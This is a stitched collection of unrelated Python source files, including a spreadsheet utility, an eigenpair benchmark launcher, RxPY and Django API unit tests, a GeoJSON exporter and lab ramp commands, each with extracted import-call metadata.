"(x=true_vals, y=predicted, ax=ax[0], marker='.', s=100)\n", (22231, 22286), True, 'import seaborn as sns\n'), ((22369, 22436), 'seaborn.distplot', 'sns.distplot', (['resid'], {'bins': '(5)', 'color': '"""c"""', 'label': '"""residuals"""', 'ax': 'ax[1]'}), "(resid, bins=5, color='c', label='residuals', ax=ax[1])\n", (22381, 22436), True, 'import seaborn as sns\n'), ((22482, 22496), 'numpy.mean', 'np.mean', (['resid'], {}), '(resid)\n', (22489, 
22496), True, 'import numpy as np\n'), ((22516, 22529), 'numpy.std', 'np.std', (['resid'], {}), '(resid)\n', (22522, 22529), True, 'import numpy as np\n'), ((22552, 22568), 'numpy.median', 'np.median', (['resid'], {}), '(resid)\n', (22561, 22568), True, 'import numpy as np\n'), ((22650, 22712), 'matplotlib.pyplot.axvline', 'plt.axvline', (['rmean'], {'color': '"""r"""', 'linestyle': '"""dashed"""', 'linewidth': '(1)'}), "(rmean, color='r', linestyle='dashed', linewidth=1)\n", (22661, 22712), True, 'import matplotlib.pyplot as plt\n'), ((22735, 22745), 'matplotlib.pyplot.ylim', 'plt.ylim', ([], {}), '()\n', (22743, 22745), True, 'import matplotlib.pyplot as plt\n'), ((10440, 10449), 'numpy.abs', 'np.abs', (['a'], {}), '(a)\n', (10446, 10449), True, 'import numpy as np\n'), ((12722, 12780), 'sklearn.gaussian_process.kernels.RBF', 'RBF', ([], {'length_scale': '(0.25)', 'length_scale_bounds': '(0.01, 1000.0)'}), '(length_scale=0.25, length_scale_bounds=(0.01, 1000.0))\n', (12725, 12780), False, 'from sklearn.gaussian_process.kernels import RBF\n'), ((13271, 13308), 'sklearn.gaussian_process.kernels.RationalQuadratic', 'RationalQuadratic', ([], {'length_scale': '(100.0)'}), '(length_scale=100.0)\n', (13288, 13308), False, 'from sklearn.gaussian_process.kernels import RationalQuadratic\n'), ((13325, 13388), 'sklearn.gaussian_process.kernels.WhiteKernel', 'WhiteKernel', ([], {'noise_level': '(0.01)', 'noise_level_bounds': '(1e-10, 10.0)'}), '(noise_level=0.01, noise_level_bounds=(1e-10, 10.0))\n', (13336, 13388), False, 'from sklearn.gaussian_process.kernels import WhiteKernel\n'), ((13639, 13693), 'sklearn.neighbors.KNeighborsRegressor', 'KNeighborsRegressor', ([], {'n_neighbors': '(5)', 'weights': '"""distance"""'}), "(n_neighbors=5, weights='distance')\n", (13658, 13693), False, 'from sklearn.neighbors import KNeighborsRegressor\n'), ((22596, 22636), 'sklearn.metrics.mean_squared_error', 'mean_squared_error', (['true_vals', 'predicted'], {}), '(true_vals, predicted)\n', (22614, 22636), False, 'from sklearn.metrics import mean_squared_error\n'), ((13736, 13899), 'sklearn.svm.SVR', 'SVR', ([], {'C': '(1.0)', 'cache_size': '(200)', 'coef0': '(0.0)', 'degree': '(3)', 'epsilon': '(0.1)', 'gamma': '"""auto_deprecated"""', 'kernel': '"""rbf"""', 'max_iter': '(-1)', 'shrinking': '(True)', 'tol': '(0.001)', 'verbose': '(False)'}), "(C=1.0, cache_size=200, coef0=0.0, degree=3, epsilon=0.1, gamma=\n 'auto_deprecated', kernel='rbf', max_iter=-1, shrinking=True, tol=0.001,\n verbose=False)\n", (13739, 13899), False, 'from sklearn.svm import SVR\n'), ((13975, 14042), 'pykrige.rk.Krige', 'Krige', ([], {'method': '"""ordinary"""', 'variogram_model': '"""spherical"""', 'verbose': '(True)'}), "(method='ordinary', variogram_model='spherical', verbose=True)\n", (13980, 14042), False, 'from pykrige.rk import Krige\n'), ((14109, 14174), 'pykrige.rk.Krige', 'Krige', ([], {'method': '"""universal"""', 'variogram_model': '"""linear"""', 'verbose': '(True)'}), "(method='universal', variogram_model='linear', verbose=True)\n", (14114, 14174), False, 'from pykrige.rk import Krige\n')]
|
# coding=utf-8
__author__ = 'zouxin'
import xlrd
import xlwt
class xlsUtil:
heading_xf = xlwt.easyxf('font: bold on; align:wrap on, vert centre, horiz center')
@staticmethod
def write_xls(sheet_name, headings, data):
heading_xf = xlsUtil.heading_xf
# data_xfs = [WriteXLSUtil.kind_to_xf_map[k] for k in WriteXLSUtil.kinds]
rowx = 0
for colx, value in enumerate(headings):
sheet_name.write(rowx, colx, value, heading_xf)
        sheet_name.set_panes_frozen(True)  # freeze headings instead of split panes
        sheet_name.set_horz_split_pos(rowx + 1)  # in general, freeze after last heading row
        sheet_name.set_remove_splits(True)  # if user does unfreeze, don't leave a split there
for row in data:
rowx += 1
for colx, value in enumerate(row):
# print ("row = {} col = {} value = {}".format(rowx, colx, value))
sheet_name.write(rowx, colx, value)
@staticmethod
def read_xls(file_name, sheet_name):
data = xlrd.open_workbook(file_name)
        table = data.sheet_by_name(sheet_name)
        rows, cols = table.nrows, table.ncols
        head = table.row_values(0)
        data = [table.row_values(row) for row in range(1, rows)]
return head, data
|
[
"xlrd.open_workbook",
"xlwt.easyxf"
] |
[((98, 168), 'xlwt.easyxf', 'xlwt.easyxf', (['"""font: bold on; align:wrap on, vert centre, horiz center"""'], {}), "('font: bold on; align:wrap on, vert centre, horiz center')\n", (109, 168), False, 'import xlwt\n'), ((1062, 1091), 'xlrd.open_workbook', 'xlrd.open_workbook', (['file_name'], {}), '(file_name)\n', (1080, 1091), False, 'import xlrd\n')]
|
"""Execute time benchmarks in a separate python session for each config."""
import os
from typing import Iterable, Tuple
from run_time_evecs import __name__ as SCRIPT
from run_time_evecs import get_output_file
from shared import layerwise_group, one_group
from shared_call import run
from shared_evecs import (
frac_batch_exact,
frac_batch_mc,
full_batch_exact,
full_batch_mc,
)
from exp.utils.deepobs import (
cifar10_3c3d,
cifar10_resnet32,
cifar10_resnet56,
cifar100_allcnnc,
fmnist_2c2d,
)
# Define settings
computations_cases = [
full_batch_exact.__name__,
full_batch_mc.__name__,
frac_batch_exact.__name__,
frac_batch_mc.__name__,
]
param_groups_cases = [
one_group.__name__,
layerwise_group.__name__,
]
architecture_cases = [
cifar10_3c3d.__name__,
fmnist_2c2d.__name__,
cifar100_allcnnc.__name__,
cifar10_resnet32.__name__,
cifar10_resnet56.__name__,
]
device_cases = ["cuda", "cpu"]
batch_sizes = {
cifar10_3c3d.__name__: "128",
fmnist_2c2d.__name__: "128",
cifar100_allcnnc.__name__: "64",
cifar10_resnet32.__name__: "128",
cifar10_resnet56.__name__: "128",
}
K_MAX = 10
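# K is the number of top eigenpairs benchmarked; each configuration sweeps k = 1..K_MAX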
def configurations_no_k() -> Iterable[Tuple[str, str, str, str, str]]:
"""Yield all configurations without looping over k."""
for architecture in architecture_cases:
N = batch_sizes[architecture]
for device in device_cases:
for param_groups in param_groups_cases:
for computations in computations_cases:
yield N, architecture, device, param_groups, computations
def configurations() -> Iterable[Tuple[str, str, str, str, str, str]]:
"""Yield all configurations."""
for N, architecture, device, param_groups, computations in configurations_no_k():
for K in range(1, K_MAX + 1):
yield N, architecture, device, param_groups, computations, str(K)
if __name__ == "__main__":
# Launch eigenpair run time benchmark which creates an output file
for N, architecture, device, param_groups, computations, K in configurations():
DATA_FILE = get_output_file(
architecture, device, param_groups, computations, N, K
)
if os.path.exists(DATA_FILE):
print(
"[exp10] Skipping computation. "
+ f"Output file already exists: {DATA_FILE}"
)
continue
print(
f"\narchitecture = {architecture}\n"
+ f"param_groups = {param_groups}\n"
+ f"computations = {computations}\n"
+ f"device = {device}\n"
+ f"N = {N}\n"
+ f"K = {K}\n"
)
cmd = [
"python",
f"{SCRIPT}.py",
N,
device,
architecture,
param_groups,
computations,
K,
]
run(cmd)
|
[
"shared_call.run",
"os.path.exists",
"run_time_evecs.get_output_file"
] |
[((2137, 2208), 'run_time_evecs.get_output_file', 'get_output_file', (['architecture', 'device', 'param_groups', 'computations', 'N', 'K'], {}), '(architecture, device, param_groups, computations, N, K)\n', (2152, 2208), False, 'from run_time_evecs import get_output_file\n'), ((2242, 2267), 'os.path.exists', 'os.path.exists', (['DATA_FILE'], {}), '(DATA_FILE)\n', (2256, 2267), False, 'import os\n'), ((2939, 2947), 'shared_call.run', 'run', (['cmd'], {}), '(cmd)\n', (2942, 2947), False, 'from shared_call import run\n')]
|
# -*- coding: utf-8 -*-
import data_quality_controller as controller
def test_check_email():
assert controller.check_email("<EMAIL>") is True
assert controller.check_email("totododo") is False
def test_check_ip():
assert controller.check_ip("192.168.127.12") is True
assert controller.check_ip("130.xx.82.195") is False
def test_full_check():
data = {
"id": 1,
"first_name": "barthel",
"last_name": "kittel",
"email": "<EMAIL>",
"gender": "Male",
"ip_address": "192.168.127.12",
"date": "06/05/2018",
"country": "france"
}
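    # only email and ip have dedicated checks; fields without one are reported as None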
expected = {
"id": None,
"first_name": None,
"last_name": None,
"email": True,
"gender": None,
"ip_address": True,
"date": None,
"country": None
}
assert expected == controller.perform_full_check(data)
|
[
"data_quality_controller.perform_full_check",
"data_quality_controller.check_email",
"data_quality_controller.check_ip"
] |
[((106, 139), 'data_quality_controller.check_email', 'controller.check_email', (['"""<EMAIL>"""'], {}), "('<EMAIL>')\n", (128, 139), True, 'import data_quality_controller as controller\n'), ((159, 193), 'data_quality_controller.check_email', 'controller.check_email', (['"""totododo"""'], {}), "('totododo')\n", (181, 193), True, 'import data_quality_controller as controller\n'), ((237, 274), 'data_quality_controller.check_ip', 'controller.check_ip', (['"""192.168.127.12"""'], {}), "('192.168.127.12')\n", (256, 274), True, 'import data_quality_controller as controller\n'), ((294, 330), 'data_quality_controller.check_ip', 'controller.check_ip', (['"""130.xx.82.195"""'], {}), "('130.xx.82.195')\n", (313, 330), True, 'import data_quality_controller as controller\n'), ((859, 894), 'data_quality_controller.perform_full_check', 'controller.perform_full_check', (['data'], {}), '(data)\n', (888, 894), True, 'import data_quality_controller as controller\n')]
|
import unittest
import rx
from rx import operators as ops
from rx.testing import TestScheduler, ReactiveTest, is_prime
on_next = ReactiveTest.on_next
on_completed = ReactiveTest.on_completed
on_error = ReactiveTest.on_error
subscribe = ReactiveTest.subscribe
subscribed = ReactiveTest.subscribed
disposed = ReactiveTest.disposed
created = ReactiveTest.created
class TestTakeWhile(unittest.TestCase):
def test_take_while_complete_Before(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(210, 2), on_next(260, 5), on_next(290, 13), on_next(
320, 3), on_completed(330), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23), on_completed(600))
invoked = 0
def factory():
def predicate(x):
nonlocal invoked
invoked += 1
return is_prime(x)
return xs.pipe(ops.take_while(predicate))
results = scheduler.start(factory)
assert results.messages == [on_next(210, 2), on_next(
260, 5), on_next(290, 13), on_next(320, 3), on_completed(330)]
assert xs.subscriptions == [subscribe(200, 330)]
assert(invoked == 4)
def test_take_while_complete_after(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(210, 2), on_next(260, 5), on_next(290, 13), on_next(
320, 3), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23), on_completed(600))
invoked = 0
def factory():
def predicate(x):
nonlocal invoked
invoked += 1
return is_prime(x)
return xs.pipe(ops.take_while(predicate))
results = scheduler.start(factory)
assert results.messages == [on_next(210, 2), on_next(260, 5), on_next(
290, 13), on_next(320, 3), on_next(350, 7), on_completed(390)]
assert xs.subscriptions == [subscribe(200, 390)]
assert(invoked == 6)
def test_take_while_error_before(self):
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(210, 2), on_next(260, 5), on_error(
270, ex), on_next(290, 13), on_next(320, 3), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23))
invoked = 0
def factory():
def predicate(x):
nonlocal invoked
invoked += 1
return is_prime(x)
return xs.pipe(ops.take_while(predicate))
results = scheduler.start(factory)
assert results.messages == [on_next(210, 2), on_next(260, 5), on_error(270, ex)]
assert xs.subscriptions == [subscribe(200, 270)]
assert(invoked == 2)
def test_take_while_error_after(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(210, 2), on_next(260, 5), on_next(290, 13), on_next(
320, 3), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23), on_error(600, 'ex'))
invoked = 0
def factory():
def predicate(x):
nonlocal invoked
invoked += 1
return is_prime(x)
return xs.pipe(ops.take_while(predicate))
results = scheduler.start(factory)
assert results.messages == [on_next(210, 2), on_next(260, 5), on_next(
290, 13), on_next(320, 3), on_next(350, 7), on_completed(390)]
assert xs.subscriptions == [subscribe(200, 390)]
assert(invoked == 6)
def test_take_while_dispose_before(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(210, 2), on_next(260, 5), on_next(290, 13), on_next(
320, 3), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23), on_completed(600))
invoked = 0
def create():
def predicate(x):
nonlocal invoked
invoked += 1
return is_prime(x)
return xs.pipe(ops.take_while(predicate))
results = scheduler.start(create, disposed=300)
assert results.messages == [on_next(210, 2), on_next(260, 5), on_next(290, 13)]
assert xs.subscriptions == [subscribe(200, 300)]
assert(invoked == 3)
def test_take_while_dispose_after(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(210, 2), on_next(260, 5), on_next(290, 13), on_next(
320, 3), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23), on_completed(600))
invoked = 0
def create():
def predicate(x):
nonlocal invoked
invoked += 1
return is_prime(x)
return xs.pipe(ops.take_while(predicate))
results = scheduler.start(create, disposed=400)
assert results.messages == [on_next(210, 2), on_next(260, 5), on_next(
290, 13), on_next(320, 3), on_next(350, 7), on_completed(390)]
assert xs.subscriptions == [subscribe(200, 390)]
assert(invoked == 6)
def test_take_while_zero(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(205, 100), on_next(210, 2), on_next(260, 5), on_next(
290, 13), on_next(320, 3), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23), on_completed(600))
invoked = 0
def create():
def predicate(x):
nonlocal invoked
invoked += 1
return is_prime(x)
return xs.pipe(ops.take_while(predicate))
results = scheduler.start(create, disposed=300)
assert results.messages == [on_completed(205)]
assert xs.subscriptions == [subscribe(200, 205)]
assert (invoked == 1)
def test_take_while_on_error(self):
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(210, 2), on_next(260, 5), on_next(290, 13), on_next(
320, 3), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23), on_completed(600))
invoked = 0
def factory():
def predicate(x):
nonlocal invoked
invoked += 1
if invoked == 3:
raise Exception(ex)
return is_prime(x)
return xs.pipe(ops.take_while(predicate))
results = scheduler.start(factory)
assert results.messages == [on_next(210, 2), on_next(260, 5), on_error(290, ex)]
assert xs.subscriptions == [subscribe(200, 290)]
assert(invoked == 3)
def test_take_while_index(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(205, 100), on_next(210, 2), on_next(260, 5), on_next(
290, 13), on_next(320, 3), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23), on_completed(600))
def factory():
return xs.pipe(ops.take_while_indexed(lambda x, i: i < 5))
results = scheduler.start(factory)
assert results.messages == [on_next(205, 100), on_next(210, 2), on_next(
260, 5), on_next(290, 13), on_next(320, 3), on_completed(350)]
assert xs.subscriptions == [subscribe(200, 350)]
|
[
"rx.operators.take_while_indexed",
"rx.testing.is_prime",
"rx.testing.TestScheduler",
"rx.operators.take_while"
] |
[((472, 487), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (485, 487), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((1335, 1350), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (1348, 1350), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((2212, 2227), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (2225, 2227), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((3005, 3020), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (3018, 3020), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((3868, 3883), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (3881, 3883), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((4673, 4688), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (4686, 4688), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((5535, 5550), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (5548, 5550), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((6340, 6355), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (6353, 6355), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((7201, 7216), 'rx.testing.TestScheduler', 'TestScheduler', ([], {}), '()\n', (7214, 7216), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((935, 946), 'rx.testing.is_prime', 'is_prime', (['x'], {}), '(x)\n', (943, 946), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((974, 999), 'rx.operators.take_while', 'ops.take_while', (['predicate'], {}), '(predicate)\n', (988, 999), True, 'from rx import operators as ops\n'), ((1779, 1790), 'rx.testing.is_prime', 'is_prime', (['x'], {}), '(x)\n', (1787, 1790), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((1818, 1843), 'rx.operators.take_while', 'ops.take_while', (['predicate'], {}), '(predicate)\n', (1832, 1843), True, 'from rx import operators as ops\n'), ((2656, 2667), 'rx.testing.is_prime', 'is_prime', (['x'], {}), '(x)\n', (2664, 2667), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((2695, 2720), 'rx.operators.take_while', 'ops.take_while', (['predicate'], {}), '(predicate)\n', (2709, 2720), True, 'from rx import operators as ops\n'), ((3451, 3462), 'rx.testing.is_prime', 'is_prime', (['x'], {}), '(x)\n', (3459, 3462), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((3490, 3515), 'rx.operators.take_while', 'ops.take_while', (['predicate'], {}), '(predicate)\n', (3504, 3515), True, 'from rx import operators as ops\n'), ((4311, 4322), 'rx.testing.is_prime', 'is_prime', (['x'], {}), '(x)\n', (4319, 4322), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((4350, 4375), 'rx.operators.take_while', 'ops.take_while', (['predicate'], {}), '(predicate)\n', (4364, 4375), True, 'from rx import operators as ops\n'), ((5116, 5127), 'rx.testing.is_prime', 'is_prime', (['x'], {}), '(x)\n', (5124, 5127), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((5155, 5180), 'rx.operators.take_while', 'ops.take_while', (['predicate'], {}), '(predicate)\n', (5169, 5180), True, 'from rx import operators as ops\n'), ((5997, 6008), 'rx.testing.is_prime', 'is_prime', (['x'], {}), '(x)\n', (6005, 6008), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((6036, 6061), 
'rx.operators.take_while', 'ops.take_while', (['predicate'], {}), '(predicate)\n', (6050, 6061), True, 'from rx import operators as ops\n'), ((6858, 6869), 'rx.testing.is_prime', 'is_prime', (['x'], {}), '(x)\n', (6866, 6869), False, 'from rx.testing import TestScheduler, ReactiveTest, is_prime\n'), ((6897, 6922), 'rx.operators.take_while', 'ops.take_while', (['predicate'], {}), '(predicate)\n', (6911, 6922), True, 'from rx import operators as ops\n'), ((7555, 7597), 'rx.operators.take_while_indexed', 'ops.take_while_indexed', (['(lambda x, i: i < 5)'], {}), '(lambda x, i: i < 5)\n', (7577, 7597), True, 'from rx import operators as ops\n')]
|
from geojson import LineString, Feature, FeatureCollection, Point
import geojson
def simple_output(parser, place_data):
for d in place_data:
print('{0}, {1}, {2}'.format(d.name, d.address, d.opening_hours_text))
def geojson_output(parser, place_data):
features = []
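    # the parsed route becomes a single LineString feature; each place becomes a Point feature carrying its attributes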
route = LineString(list(map(lambda p: (p['lon'], p['lat']), parser.points())))
route_feature = Feature(geometry=route)
features.append(route_feature)
places = list(map(lambda p: Feature(geometry=Point(p.coord),properties=p._asdict()), place_data))
features.extend(places)
collection = FeatureCollection(features)
dump = geojson.dumps(collection, sort_keys=True, indent=4)
print(dump)
|
[
"geojson.Point",
"geojson.Feature",
"geojson.FeatureCollection",
"geojson.dumps"
] |
[((387, 410), 'geojson.Feature', 'Feature', ([], {'geometry': 'route'}), '(geometry=route)\n', (394, 410), False, 'from geojson import LineString, Feature, FeatureCollection, Point\n'), ((595, 622), 'geojson.FeatureCollection', 'FeatureCollection', (['features'], {}), '(features)\n', (612, 622), False, 'from geojson import LineString, Feature, FeatureCollection, Point\n'), ((634, 685), 'geojson.dumps', 'geojson.dumps', (['collection'], {'sort_keys': '(True)', 'indent': '(4)'}), '(collection, sort_keys=True, indent=4)\n', (647, 685), False, 'import geojson\n'), ((496, 510), 'geojson.Point', 'Point', (['p.coord'], {}), '(p.coord)\n', (501, 510), False, 'from geojson import LineString, Feature, FeatureCollection, Point\n')]
|
# ===============================================================================
# Copyright 2012 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from traits.api import Float, Str
from traitsui.api import View, Item, VGroup, EnumEditor
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.pyscripts.commands.core import Command
from traitsui.menu import OKCancelButtons
class Ramp(Command):
setpoint = Float(1)
rate = Float(1)
start = Str
_default_period = 60
period = Float(_default_period)
def traits_view(self):
v = View(
Item("setpoint", label="Setpoint (C)"),
Item("rate", label="Rate C/hr"),
VGroup(
Item("start", label="Start Setpoint (C)"),
Item("period", label="Update Period (s)"),
show_border=True,
label="Optional",
),
buttons=OKCancelButtons,
)
return v
def _to_string(self):
start = None
try:
            start = float(self.start)
except (ValueError, TypeError):
pass
words = [
("setpoint", self.setpoint, True),
("rate", self.rate, True),
]
if start is not None:
words.append(("start", start, True))
if self.period != self._default_period:
words.append(("period", self.period, True))
return self._keywords(words)
time_dict = dict(h="hours", m="minutes", s="seconds")
class Setpoint(Command):
setpoint = Float
duration = Float
units = Str("h")
def _get_view(self):
v = VGroup(
Item("setpoint", label="Temperature (C)"),
Item("duration", label="Duration (units)"),
Item(
"units",
editor=EnumEditor(values=time_dict),
),
)
return v
def _to_string(self):
words = [
("temperature", self.setpoint, True),
("duration", self.duration, True),
("units", self.units),
]
return self._keywords(words)
# ============= EOF =============================================
|
[
"traits.api.Float",
"traitsui.api.EnumEditor",
"traits.api.Str",
"traitsui.api.Item"
] |
[((1193, 1201), 'traits.api.Float', 'Float', (['(1)'], {}), '(1)\n', (1198, 1201), False, 'from traits.api import Float, Str\n'), ((1213, 1221), 'traits.api.Float', 'Float', (['(1)'], {}), '(1)\n', (1218, 1221), False, 'from traits.api import Float, Str\n'), ((1276, 1298), 'traits.api.Float', 'Float', (['_default_period'], {}), '(_default_period)\n', (1281, 1298), False, 'from traits.api import Float, Str\n'), ((2352, 2360), 'traits.api.Str', 'Str', (['"""h"""'], {}), "('h')\n", (2355, 2360), False, 'from traits.api import Float, Str\n'), ((1357, 1395), 'traitsui.api.Item', 'Item', (['"""setpoint"""'], {'label': '"""Setpoint (C)"""'}), "('setpoint', label='Setpoint (C)')\n", (1361, 1395), False, 'from traitsui.api import View, Item, VGroup, EnumEditor\n'), ((1409, 1440), 'traitsui.api.Item', 'Item', (['"""rate"""'], {'label': '"""Rate C/hr"""'}), "('rate', label='Rate C/hr')\n", (1413, 1440), False, 'from traitsui.api import View, Item, VGroup, EnumEditor\n'), ((2419, 2460), 'traitsui.api.Item', 'Item', (['"""setpoint"""'], {'label': '"""Temperature (C)"""'}), "('setpoint', label='Temperature (C)')\n", (2423, 2460), False, 'from traitsui.api import View, Item, VGroup, EnumEditor\n'), ((2474, 2516), 'traitsui.api.Item', 'Item', (['"""duration"""'], {'label': '"""Duration (units)"""'}), "('duration', label='Duration (units)')\n", (2478, 2516), False, 'from traitsui.api import View, Item, VGroup, EnumEditor\n'), ((1478, 1519), 'traitsui.api.Item', 'Item', (['"""start"""'], {'label': '"""Start Setpoint (C)"""'}), "('start', label='Start Setpoint (C)')\n", (1482, 1519), False, 'from traitsui.api import View, Item, VGroup, EnumEditor\n'), ((1537, 1578), 'traitsui.api.Item', 'Item', (['"""period"""'], {'label': '"""Update Period (s)"""'}), "('period', label='Update Period (s)')\n", (1541, 1578), False, 'from traitsui.api import View, Item, VGroup, EnumEditor\n'), ((2584, 2612), 'traitsui.api.EnumEditor', 'EnumEditor', ([], {'values': 'time_dict'}), '(values=time_dict)\n', (2594, 2612), False, 'from traitsui.api import View, Item, VGroup, EnumEditor\n')]
|
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag
from post.serializers import TagSerializer
TAGS_URL = reverse('post:tag-list')
class PublicTagsApiTests(TestCase):
"""Tests for public tags api funtions"""
def setUp(self):
self.client = APIClient()
def test_login_required(self):
"""Test that login is required to list the tags"""
res = self.client.get(TAGS_URL)
        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTests(TestCase):
"""Tests for private(authed) tags api functions"""
def setUp(self):
params = {
'email': '<EMAIL>',
'password': '<PASSWORD>',
'name': 'Test User'
}
self.user = get_user_model().objects.create_user(**params)
self.client = APIClient()
self.client.force_authenticate(user=self.user)
def test_retrieve_tags(self):
"""Test retrieving tags"""
Tag.objects.create(user=self.user, name='TestTag')
Tag.objects.create(user=self.user, name='TestTag2')
tags = Tag.objects.all().order_by('-name')
serializer = TagSerializer(tags, many=True)
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_retrieve_tags_limited_to_user(self):
"""Test retrieving tags belong to the specific user"""
user2 = get_user_model().objects.create_user(
email='<EMAIL>',
password='<PASSWORD>'
)
tag = Tag.objects.create(user=self.user, name='TestTag')
Tag.objects.create(user=user2, name='TestTag2')
res = self.client.get(TAGS_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data[0]['name'], tag.name)
def test_create_tags_successful(self):
"""Test creating a tag successfully"""
params = {
'name': 'tag1',
}
res = self.client.post(TAGS_URL, params)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
tags_exists = Tag.objects.filter(user=self.user, name='tag1').exists()
self.assertTrue(tags_exists)
def test_create_tags_invalid(self):
"""Test creating a tag invalid attrs"""
params = {
'name': '',
}
res = self.client.post(TAGS_URL, params)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
|
[
"core.models.Tag.objects.create",
"core.models.Tag.objects.filter",
"post.serializers.TagSerializer",
"django.contrib.auth.get_user_model",
"django.urls.reverse",
"core.models.Tag.objects.all",
"rest_framework.test.APIClient"
] |
[((274, 298), 'django.urls.reverse', 'reverse', (['"""post:tag-list"""'], {}), "('post:tag-list')\n", (281, 298), False, 'from django.urls import reverse\n'), ((426, 437), 'rest_framework.test.APIClient', 'APIClient', ([], {}), '()\n', (435, 437), False, 'from rest_framework.test import APIClient\n'), ((984, 995), 'rest_framework.test.APIClient', 'APIClient', ([], {}), '()\n', (993, 995), False, 'from rest_framework.test import APIClient\n'), ((1129, 1179), 'core.models.Tag.objects.create', 'Tag.objects.create', ([], {'user': 'self.user', 'name': '"""TestTag"""'}), "(user=self.user, name='TestTag')\n", (1147, 1179), False, 'from core.models import Tag\n'), ((1188, 1239), 'core.models.Tag.objects.create', 'Tag.objects.create', ([], {'user': 'self.user', 'name': '"""TestTag2"""'}), "(user=self.user, name='TestTag2')\n", (1206, 1239), False, 'from core.models import Tag\n'), ((1313, 1343), 'post.serializers.TagSerializer', 'TagSerializer', (['tags'], {'many': '(True)'}), '(tags, many=True)\n', (1326, 1343), False, 'from post.serializers import TagSerializer\n'), ((1756, 1806), 'core.models.Tag.objects.create', 'Tag.objects.create', ([], {'user': 'self.user', 'name': '"""TestTag"""'}), "(user=self.user, name='TestTag')\n", (1774, 1806), False, 'from core.models import Tag\n'), ((1815, 1862), 'core.models.Tag.objects.create', 'Tag.objects.create', ([], {'user': 'user2', 'name': '"""TestTag2"""'}), "(user=user2, name='TestTag2')\n", (1833, 1862), False, 'from core.models import Tag\n'), ((1256, 1273), 'core.models.Tag.objects.all', 'Tag.objects.all', ([], {}), '()\n', (1271, 1273), False, 'from core.models import Tag\n'), ((2356, 2403), 'core.models.Tag.objects.filter', 'Tag.objects.filter', ([], {'user': 'self.user', 'name': '"""tag1"""'}), "(user=self.user, name='tag1')\n", (2374, 2403), False, 'from core.models import Tag\n'), ((914, 930), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (928, 930), False, 'from django.contrib.auth import get_user_model\n'), ((1631, 1647), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (1645, 1647), False, 'from django.contrib.auth import get_user_model\n')]
|
